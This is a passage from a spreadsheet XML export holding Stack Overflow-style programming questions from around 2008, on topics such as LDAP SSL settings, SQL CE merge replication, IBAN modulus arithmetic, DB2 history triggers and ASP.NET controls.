    <t xml:space="preserve">&lt;p&gt;I need to use feature stapler to add some text columns to Posts list inside OOTB blog site definition. I plan not to use site columns, but only to add those columns to list (I don't use site columns because I have multiple site collections and there will be only one Posts list per site collection, so site columns are not very reusable in this case). My question is: How do I achieve this? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unable to turn on SecureSocketLayer with DirectoryServices.Protocols.LdapConnection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to fix a bug with SSL in a product and noticed that although the code sets SSL to be true, in the next line in the code SSL is still at false. I wrote a unit test for this and the unit test confirms my suspicions. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  [TestMethod]
  public void SecureSocketLayerSetToTrue( )
  {
     var ldapConnection = new LdapConnection( 
                                new LdapDirectoryIdentifier( "ldap.test.com", 636 ));
     ldapConnection.SessionOptions.SecureSocketLayer = true;
     Assert.IsTrue( ldapConnection.SessionOptions.SecureSocketLayer );
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The test fails. Is there something here that I am missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create or read OpenOffice spreadsheets from Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a good way to create and read an OpenOffice spreadsheet in Perl?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.Net Client Events on DropDownList?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a client event that I can use for when a DropDownList's data has been loaded/bound onto the control? I need to trigger event on their side when this happens.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Basically, I am trying to lock out the controls while the data is being loaded as if there is a slowdown (not uncommon) a user can start inputting data and then lose focus as they are typing. &lt;/p&gt;
&lt;p&gt;I tried doing this in the  tags but the methods located there seem to stop working after the first postback! (Any help there would be greatly appreciated). As a workaround I tried attaching the events to the elements themselves and while this works for locking, using the onchange event, I am unable to unlock it upon the data successfully loading!&lt;/p&gt;
&lt;p&gt;Any ideas? Thanks for the answers so far :) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simulating connection problems for .NET HttpWebRequest</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there ways to programmatically simulate connection problems (slow connection, response does not complete, connection gets dropped, etc.) when using the HttpWebRequest class?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;EDIT: To elaborate more, I need this for debugging but would want to turn it into a test eventually. I'm using the async methods BeginGetRequestStream, EndGetRequestStream, BeginGetResponse and EndGetResponse. I have wrapped them all in proper (I hope) Try Catch blocks which log the exceptions that happen.&lt;/p&gt;
&lt;p&gt;I know this works for some cases (e.g. when I pull out the network cable). But on some rare occasions (i.e. only when the website I'm requesting is slow) then my system crashes and I get this in the Event Log&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception: System.Net.WebException
Message: The request was aborted: The connection was closed unexpectedly.
StackTrace:    at System.Net.ConnectStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
   at System.IO.Compression.DeflateStream.ReadCallback(IAsyncResult baseStreamResult)
   at System.Net.LazyAsyncResult.Complete(IntPtr userToken)
   at System.Net.ContextAwareResult.CompleteCallback(Object state)
   at System.Threading.ExecutionContext.runTryCode(Object userData)
   at System.Runtime.CompilerServices.RuntimeHelpers.ExecuteCodeWithGuaranteedCleanup(TryCode code, CleanupCode backoutCode, Object userData)
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Net.ContextAwareResult.Complete(IntPtr userToken)
   at System.Net.LazyAsyncResult.ProtectedInvokeCallback(Object result, IntPtr userToken)
   at System.Net.Sockets.BaseOverlappedAsyncResult.CompletionPortCallback(UInt32 errorCode, UInt32 numBytes, NativeOverlapped* nativeOverlapped)
   at System.Threading._IOCompletionCallback.PerformIOCompletionCallback(UInt32 errorCode, UInt32 numBytes, NativeOverlapped* pOVERLAP)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am making an assumption it's from HttpWebRequest but then again all my code is wrapped in Try Catch blocks.&lt;/p&gt;
&lt;p&gt;Would mocks help in such a case?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to implement CEditListCtrl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to implement CEditListCtrl?. List control with edit capabality (Report/Grid view).
I have a list view in Report View. It has some values. I need to extend this to edit the values present in the list view.
I declared a class which inherits from CListCtrl. And I have handled the two Window messages to start and end the edit. Upon getting the messages I am displaying a Text box. But I am not getting the control inside these message handlers. Is there a way to know the reason?&lt;/p&gt;
&lt;p&gt;Or Is there a other way to implement this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Partial sharing of git repositories</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to git. I am wondering whether the following scenario is supported, and if so how (i.e. git commands for setup and update).&lt;/p&gt;
&lt;p&gt;A repository is available from three different places: 'local', 'mirror' and 'github'. 'mirror' mirrors 'local' completely and 'github' mirrors 'local' except for a 'copyrighted' directory.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DropDownList with LinqDataSource and an empty option</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there some elegant way to add an empty option to a DropDownList bound with a LinqDataSource?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sql Server CE 3.5 Merge Replication Synchronise is Hanging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using SQL Server 2005 CE framework 3.5 and attempting to use merge replication between my hand held and my SQL Server.  When I run the code to synchronise it just seems to sit forever, and when I put a breakpoint in my code it never gets past the call to Synchronize().&lt;/p&gt;
&lt;p&gt;If I look at the replication monitor in sql server, it gets to the point where it says the subscription is no longer synchronising and doesn't show any errors.  Therefore I am assuming this to mean the synchronisation is complete.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://server/virtualdirectory/sqlcesa35.dll?diag" rel="nofollow"&gt;http://server/virtualdirectory/sqlcesa35.dll?diag&lt;/a&gt; does not report any issues.&lt;/p&gt;
&lt;p&gt;This is my first attempt at any handheld development, so I may have done something daft.  However, SQL Server seems to be reporting a successful synchronisation.&lt;/p&gt;
&lt;p&gt;Any help would be greatly appreciated as I have spent ages on this ! &lt;/p&gt;
&lt;p&gt;Here is my code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const string DatabasePath = @"SD Card\mydb.sdf";
var repl = new SqlCeReplication
               {
                   ConnectionManager = true,
                   InternetUrl = @"http://server/virtualdirectory/sqlcesa35.dll",
                   Publisher = @"servername",
                   PublisherDatabase = @"databasename",
                   PublisherSecurityMode = SecurityType.DBAuthentication,
                   PublisherLogin = @"username",
                   PublisherPassword = @"password",
                   Publication = @"publicationname",
                   Subscriber = @"PPC",
                   SubscriberConnectionString = "Data Source=" + DatabasePath
               };
try
{
    Cursor.Current = Cursors.WaitCursor;
    if (!File.Exists(DatabasePath))
    {
        repl.AddSubscription(AddOption.CreateDatabase);
    }
    repl.Synchronize();
    MessageBox.Show("Successfully synchronised");
}
catch (SqlCeException e)
{
    DisplaySqlCeErrors(e.Errors, e);
}
finally
{
    repl.Dispose();
    Cursor.Current = Cursors.Default;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you override ToString in a static class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a public static class in which I would like to have a ToString() method.  &lt;/p&gt;
&lt;p&gt;I have defined it as public static string ToString(), but get the following warning:  &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;'Class.ToString()' hides inherited member 'object.ToString()'.  To make the current member override that implementation, add the override keyword.  Otherwise add the new keyword.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If I add the override keyword I get this error instead:  &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A static member 'Class.ToString()' cannot be marked as override, virtual, or abstract&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How do I get rid of that warning and let my static class have the ToString() method.&lt;/p&gt;
&lt;p&gt;Thank you,&lt;br /&gt;
Keith&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Perform a modulus in a huge number?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to do a modulus operation on very large integers.  The biggest integer supported by my platform (edit: .NET 2.0) is a 64 bit integer, which aren't big enough for the numbers I'm working with.&lt;/p&gt;
&lt;p&gt;How can I do a modulus on really big integers, like 12654875632126424875387321657498462167853687516876876?&lt;/p&gt;
&lt;p&gt;I have a solution that treats the number as a string and works it in pieces one by one, but I wanted to know if there's a better way.&lt;/p&gt;
&lt;p&gt;Here's my function treating the number as a string.  It basically does long division the way you'd do it by hand.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Public Function MyMod(ByVal numberString As String, ByVal modby As Integer) As Integer
        Dim position As Integer = -1
        Dim curSubtraction As Integer = 0
        While position &amp;lt; numberString.Length - 1
            position += 1
            curSubtraction = curSubtraction * 10 + CInt(numberString.Substring(position, 1))
            If (curSubtraction / modby) &amp;lt; 1 And position = numberString.Length - 1 Then
                Return curSubtraction
            ElseIf (curSubtraction / modby) &amp;lt; 1 Then
                Continue While
            Else
                curSubtraction = curSubtraction Mod modby
            End If
        End While
        Return curSubtraction
    End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a cleaner, more efficient way?&lt;/p&gt;
&lt;p&gt;EDIT: To clarify, the integers are coming from IBAN bank account numbers.  According to the specification, you have to convert the IBAN account number (containing letters) into one integer.  Then, you do a modulus on the integer.  So, I guess you could say that the real source of the integer to perform the modulus on is a string of digits.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best process for auto-zipping of multiple MP3s</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a project which requires a fairly complicated process and I want to make sure I know the best way to do this. I'm using ASP.net C# with Adobe Flex 3. The app server is Mosso (cloud server) and the file storage server is Amazon S3. The existing site can be viewed at &lt;a href="https://www.noisetrade.com" rel="nofollow"&gt;NoiseTrade.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I need to do this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Allow users to upload MP3 files to
an album "widget" &lt;/li&gt;
&lt;li&gt;After the user has uploaded their
album/widget, I need to
automatically zip the mp3 (for other
users to download) and upload the
zip along with the mp3 tracks to
Amazon S3&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I actually have this working already (using client side processing in Flex) but this no longer works because of Adobe's flash 10 "security" update. So now I need to implement this server-side.&lt;/p&gt;
&lt;p&gt;The way I am thinking of doing this is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Store the mp3 in a temporary folder
on the app server&lt;/li&gt;
&lt;li&gt;When the artist "publishes" create a
zip of the files in that folder
using a c# library&lt;/li&gt;
&lt;li&gt;Start the amazon S3 upload process (zip and mp3s)
and email the user when it is
finished (as well as deleting the
temporary folder)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The major problem I see with this approach is that if a user deletes or adds a track later on I'll have to update the zip file but the temporary files will not longer exist.&lt;/p&gt;
&lt;p&gt;I'm at a loss at the best way to do this and would appreciate any advice you might have.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does VS2008 have somewhat C++0x support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does VS2008 have somewhat C++0x standard support?&lt;/p&gt;
&lt;p&gt;DUPLICATE &lt;a href="http://stackoverflow.com/questions/146381/visual-studio-support-for-new-c-c-standards"&gt;http://stackoverflow.com/questions/146381/visual-studio-support-for-new-c-c-standards&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Script Minification and Continuous Integration with MSBuild</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On a recent project I have been working on in C#/ASP.NET I have some fairly complicated JavaScript files and some nifty Style Sheets.  As these script resources grow in size it &lt;a href="http://developer.yahoo.com/yui/compressor/"&gt;is advisable to minify the resources&lt;/a&gt; and keep your web pages as light as possible, of course. I know many developers who hand-feed their JavaScript resources into compressors after debugging and then deploy their applications.&lt;/p&gt;
&lt;p&gt;When it comes to source control and automated builds in the satisfying world of continuous integration (thank you &lt;a href="http://confluence.public.thoughtworks.org/display/CCNET/Welcome%2Bto%2BCruiseControl.NET"&gt;CruiseControl.NET&lt;/a&gt;); hand compression will simply not do. The only way to maintain source control and offer compressed resources is to keep JS/CSS source &amp;amp; their minified brethren in a separate directory structure. Then register only one set of resources or the other in code-behind.  However, if a developer makes a change to JS/CSS source and then fails to re-compact it and check in both versions, then youâ€™re code-line is now out of sync. Not to mention inelegant.&lt;/p&gt;
&lt;p&gt;I am thinking that it would be nice to write a custom executable (if one does not exist yet) for the CC.NET task block which would find and compress all JavaScript and CSS resources in the target directory after the build action but before the asp.net publish to target. This way, developers would only work on JS and CSS source and users would only get the minified resources.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is there an application that already performs this task and if not, what kind of resource(s) should I look to install on the build server to have CC.NET execute?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;(The &lt;a href="http://stackoverflow.com/questions/258781/best-packing-strategy-for-js-during-continuous-integration"&gt;closest question&lt;/a&gt; I could find here to this one required NAnt, which is not an option in my case.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
Dave Ward now has a great article on &lt;a href="http://encosia.com/2009/05/20/automatically-minify-and-combine-javascript-in-visual-studio/"&gt;how to automatically minify in Visual Studio&lt;/a&gt; at his site.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Membership.GetUser() &amp; MARS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using asp.net membership, and need to make a call to Membership.GetUser() while I have another open SQL connection, but my code dies at that call.  I have MultipleActiveResultSets=True in the connection string that is used by both my code and the Membership provider.  It appears that the Membership class is ignoring the MARS part of the connect string.&lt;/p&gt;
&lt;p&gt;Any suggestions as to how I can get MARS to work with the Membership class so I can solve this problem?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Scott&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I collapse elements in a Report Table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an SSRS report where I need to collapse data into a summary column like so:&lt;br&gt;
+Program&lt;br&gt;
-Program2&lt;br&gt;
&amp;nbsp; Program2DataElement1 | Program2DataElement2 | etc.&lt;/p&gt;
&lt;p&gt;How does one doe this?  I see it in other reports, but can't for the life of me find the area to set it up.  When I put in a group, I get something like this on all records: &lt;br&gt;
Program&lt;br&gt;
&amp;nbsp; ProgramDataElement | ProgramDataElement | ...&lt;/p&gt;
&lt;p&gt;What am I mising?  Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vertical Text with jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to vertically align text by adding &lt;code&gt;&amp;lt;br /&amp;gt;&lt;/code&gt; tags between characters with jQuery.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="foo"&amp;gt;&amp;lt;label&amp;gt;Vertical Text&amp;lt;/label&amp;gt;&amp;lt;/div&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would look like this:&lt;/p&gt;
&lt;p&gt;V&lt;br /&gt;
e&lt;br /&gt;
r&lt;br /&gt;
t&lt;br /&gt;
i&lt;br /&gt;
c&lt;br /&gt;
a&lt;br /&gt;
l&lt;br /&gt;
&lt;br /&gt;
T&lt;br /&gt;
e&lt;br /&gt;
x&lt;br /&gt;
t&lt;br /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>question on how to use sql server integrated service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table called book with, the attrbutes are booked_id, yearmon, and day_01....day_31. Now i need to unpivot the table and transform day_01...day_31 into rows, I have successed in doing that, but the problem is that my yearmon is a format of 200805 and i need to append a day to it based on day_01 or day_02 etc, so that i can create a new column with date information for example, if it is day_01, it looks like 20080501. Instead of writing huge query, does anyone how to use ssis to tranform it&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to implement friendly URL in ASP.net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to implement friendly URL in ASP.net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>External Tool Development for SQL Server Management Studio 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have any experience of developing external tools for SSMS 2005.  &lt;/p&gt;
&lt;p&gt;Ideally I would like to be able to interact with the query windows directly, for example, taking the query text from the window to perform some processing on it.&lt;/p&gt;
&lt;p&gt;Any pointers in the right direction would be great.&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UTF-8 all the way through</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;
I'm setting up a new server, and want to support UTF-8 fully in my web application. I have tried in the past on existing servers and always seem to end up having to fall back to ISO-8859-1.&lt;/p&gt;
&lt;p&gt;Where exactly do I need to set the encoding/charsets? I'm aware that I need to configure Apache, MySQL and PHP to do this - is there some standard checklist I can follow, or perhaps troubleshoot where the mismatches occur?&lt;/p&gt;
&lt;p&gt;This is for a new Linux server, running MySQL 5, PHP 5 and Apache 2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get a collection of all the colors in System.Drawing.Color?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I extract the list of colors in the System.Drawing.Color struct into a collection or array?&lt;/p&gt;
&lt;p&gt;Is there a more efficient way of getting a collection of colors than using this struct as a base?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to invoke a C# web service through PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written a web service using ASP.NET (in C#) and I'm attempting to write an example PHP client using NuSOAP.  Where I'm tripped up on are examples of how to do this; some show &lt;code&gt;soapval&lt;/code&gt; being used (and I don't quite understand the parameters - for example passing &lt;code&gt;false&lt;/code&gt; as &lt;code&gt;string&lt;/code&gt; types, etc.), while others are just using straight &lt;code&gt;array&lt;/code&gt;s.  Let's say the WSDL for my web service as reported by &lt;code&gt;http://localhost:3333/Service.asmx?wsdl&lt;/code&gt; looks something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;POST /Service.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/webservices/DoSomething"
&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&amp;gt;
  &amp;lt;soap:Body&amp;gt;
	&amp;lt;DoSomething xmlns="http://tempuri.org/webservices"&amp;gt;
	  &amp;lt;anId&amp;gt;int&amp;lt;/anId&amp;gt;
	  &amp;lt;action&amp;gt;string&amp;lt;/action&amp;gt;
	  &amp;lt;parameters&amp;gt;
		&amp;lt;Param&amp;gt;
		  &amp;lt;Value&amp;gt;string&amp;lt;/Value&amp;gt;
		  &amp;lt;Name&amp;gt;string&amp;lt;/Name&amp;gt;
		&amp;lt;/Param&amp;gt;
		&amp;lt;Param&amp;gt;
		  &amp;lt;Value&amp;gt;string&amp;lt;/Value&amp;gt;
		  &amp;lt;Name&amp;gt;string&amp;lt;/Name&amp;gt;
		&amp;lt;/Param&amp;gt;
	  &amp;lt;/parameters&amp;gt;
	&amp;lt;/DoSomething&amp;gt;
  &amp;lt;/soap:Body&amp;gt;
&amp;lt;/soap:Envelope&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My first PHP attempt looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
require_once('lib/nusoap.php');
$client = new nusoap_client('http://localhost:3333/Service.asmx?wsdl');
$params = array(
	'anId' =&amp;gt; 3, //new soapval('anId', 'int', 3),
	'action' =&amp;gt; 'OMNOMNOMNOM',
	'parameters' =&amp;gt; array(
		'firstName' =&amp;gt; 'Scott',
		'lastName' =&amp;gt; 'Smith'
	)
);
$result = $client-&amp;gt;call('DoSomething', $params, 'http://tempuri.org/webservices/DoSomething', 'http://tempuri.org/webservices/DoSomething');
print_r($result);
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now aside from the Param type being a complex type which I'm pretty sure my simple &lt;code&gt;$array&lt;/code&gt; attempt will not automagically work with, I'm breakpointing in my web service and seeing the method I've marked as &lt;code&gt;WebMethod&lt;/code&gt; (without renaming it, its literally &lt;code&gt;DoSomething&lt;/code&gt;) and seeing the arguments are all default values (the &lt;code&gt;int&lt;/code&gt; is &lt;code&gt;0&lt;/code&gt;, the &lt;code&gt;string&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt;, etc.).&lt;/p&gt;
&lt;p&gt;What should my PHP syntax look like, and what do I have to do to pass the &lt;code&gt;Param&lt;/code&gt; type correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I style XML with CSS for viewing in a browser without first transforming to (X)HTML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that CSS can be used to control the presentation of (X)HTML in modern browsers. I was under the impression that this was possible for arbitrary XML as well.  (Am I mistaken?)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A concrete example&lt;/strong&gt;: given the following XML&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;log&amp;gt;
  &amp;lt;entry revision="1"&amp;gt;
    &amp;lt;author&amp;gt;J Random Hacker&amp;lt;/author&amp;gt;
    &amp;lt;message&amp;gt;Some pithy explanation&amp;lt;/message&amp;gt;
  &amp;lt;/entry&amp;gt;
&amp;lt;/log&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to associate a CSS with this XML such that when viewed in a modern (WebKit, FireFox) browser, I see something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+----------------------------------+
| revision | 1                     |
+----------------------------------+
| author   | J Random Hacker       |
+----------------------------------+
| message  | Some pithy explanation|
+----------------------------------+
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where my oh-so-beautiful ascii-art is meant to indicate some table-like layout.&lt;/p&gt;
&lt;p&gt;That is: XML+CSS --&gt; "pixels for user" instead of XML+XSLT --&gt; XHTML+CSS --&gt; "pixels for user".&lt;/p&gt;
&lt;p&gt;My hope is that this approach could be simpler way (for me) to present XML documents that are already document-like in their structure.  I'm also just plain curious.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which style of Ruby string quoting do you favour?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which style of Ruby string quoting do you favour? Up until now I've always used &lt;code&gt;'single quotes'&lt;/code&gt; unless the string contains certain escape sequences or interpolation, in which case I obviously have to use &lt;code&gt;"double quotes"&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;However, is there really any reason not to just use double quoted strings everywhere?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can CCK take care of my fields for a programatically defined node type in drupal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does the CCK api allow me to create a node type, from a custom module, with a bunch of fields that use CCK to store their state?  If so can these fields be locked so that users may not alter them, but still allow the user to add more fields to the node type?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Log4Net run so slow in my Windows Service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a windows service that uses log4net. We noticed that the service in question was running painfully slow so we attached a debugger to it and stepped through. It appears that each time it tries to write an entry to the log via log4net that it takes anywhere from 10 to 30 seconds before the next line of code can execute. Obviously this adds up...&lt;/p&gt;
&lt;p&gt;The service is 2.0 .net
We're using log4Net 1.2.0.30714.
We've tested this on a machine running vista and a machine running win sever 2003 and have seen the same or similar results.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenCV Object Detection - Center Point</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given an object on a plain white background, does anybody know if OpenCV provides functionality to easily detect an object from a captured frame?  &lt;/p&gt;
&lt;p&gt;I'm trying to locate the corner/center points of an object (rectangle).  The way I'm currently doing it, is by brute force (scanning the image for the object) and not accurate. I'm wondering if there is functionality under the hood that i'm not aware of.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit Details&lt;/strong&gt;:
The size about the same as a small soda can.  The camera is positioned above the object, to give it a 2D/Rectangle feel.  The orientation/angle from from the camera is random, which is calculated from the corner points.&lt;/p&gt;
&lt;p&gt;It's just a white background, with the object on it (black).  The quality of the shot is about what you'd expect to see from a Logitech webcam.&lt;/p&gt;
&lt;p&gt;Once I get the corner points, I calculate the center.  The center point is then converted to centimeters.&lt;/p&gt;
&lt;p&gt;It's refining just 'how' I get those 4 corners is what I'm trying to focus on.  You can see my brute force method with this image: &lt;a href="http://i228.photobucket.com/albums/ee295/AOC_Ethanael/can.png"&gt;Image&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you check for ajax updates using a WebBrowser control in .net 2.0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web page that is being displaying in a winform app using the WebBrowser Control. I need to perform an event when the HTML in the web page changes; however, I cannot find an event that is triggered for situations when the pages is updated through Ajax. The DocumentComplete, FileDownloaded, and ProgressChanged events are not always triggered by Ajax requests. The only other way I can think to solve the issue is to poll the document object and look for changes; however, I don't think that is a very good solution. &lt;/p&gt;
&lt;p&gt;Is there another event I am missing that will be triggered on an ajax update or some other way to solve the problem? &lt;/p&gt;
&lt;p&gt;I am using C# and .net 2.0&lt;/p&gt;
</t>
  </si>
  <si>
    <t>file path portability</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a program that I need to run under *nix and windows. because the program takes file paths from files the issue is what to do about the &lt;code&gt;\&lt;/code&gt; vs &lt;code&gt;/&lt;/code&gt; issue. &lt;/p&gt;
&lt;p&gt;My current thought is to put in a regex that converts the wrong one to the right one depending on what system I'm on. This will have the effect of letting either type work on either system. Aside from the fact that &lt;a href="http://fishbowl.pastiche.org/2003/08/18/beware_regular_expressions/" rel="nofollow"&gt;now I have two problems&lt;/a&gt;, does anyone see any other problems?&lt;/p&gt;
&lt;p&gt;(Other better solutions are more than welcome)&lt;/p&gt;
&lt;p&gt;Edit: the primary issue is getting windows paths to work on unix rather than the other way around.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Email Notification Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some ideas (using .NET and SQL 2005) for implementing a service that sends emails?  The emails are to be data-driven.  The date and time an email is to be sent is a field in a table.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create DB2 History Table Trigger</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a history table to track field changes across a number of tables in DB2. &lt;/p&gt;
&lt;p&gt;I know history is usually done with copying an entire table's structure and giving it a suffixed name (e.g. user --&gt; user_history). Then you can use a pretty simple trigger to copy the old record into the history table on an UPDATE.&lt;/p&gt;
&lt;p&gt;However, for my application this would use too much space. It doesn't seem like a good idea (to me at least) to copy an entire record to another table every time a field changes. So I thought I could have a generic 'history' table which would track individual field changes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE history
(
    history_id LONG GENERATED ALWAYS AS IDENTITY,
    record_id INTEGER NOT NULL,
    table_name VARCHAR(32) NOT NULL,
    field_name VARCHAR(64) NOT NULL,
    field_value VARCHAR(1024),
    change_time TIMESTAMP,
    PRIMARY KEY (history_id)
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;OK, so every table that I want to track has a single, auto-generated id field as the primary key, which would be put into the 'record_id' field. And the maximum VARCHAR size in the tables is 1024. Obviously if a non-VARCHAR field changes, it would have to be converted into a VARCHAR before inserting the record into the history table.&lt;/p&gt;
&lt;p&gt;Now, this could be a completely retarded way to do things (hey, let me know why if it is), but I think it it's a good way of tracking changes that need to be pulled up rarely and need to be stored for a significant amount of time.  &lt;/p&gt;
&lt;p&gt;Anyway, I need help with writing the trigger to add records to the history table on an update. Let's for example take a hypothetical user table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE user
(
   user_id INTEGER GENERATED ALWAYS AS IDENTITY,
   username VARCHAR(32) NOT NULL,
   first_name VARCHAR(64) NOT NULL,
   last_name VARCHAR(64) NOT NULL,
   email_address VARCHAR(256) NOT NULL
   PRIMARY KEY(user_id)
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, can anyone help me with a trigger on an update of the user table to insert the changes into the history table? My guess is that some procedural SQL will need to be used to loop through the fields in the old record, compare them with the fields in the new record and if they don't match, then add a new entry into the history table. &lt;/p&gt;
&lt;p&gt;It'd be preferable to use the same trigger action SQL for every table, regardless of its fields, if it's possible.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get projects to place their build output into the same directory with Scons?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;Background&lt;/h2&gt;
&lt;p&gt;I'm trying out Scons by setting up a basic C++ sample project that has two sub-projects: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Prj1 is an EXE that depends on Prj2&lt;/li&gt;
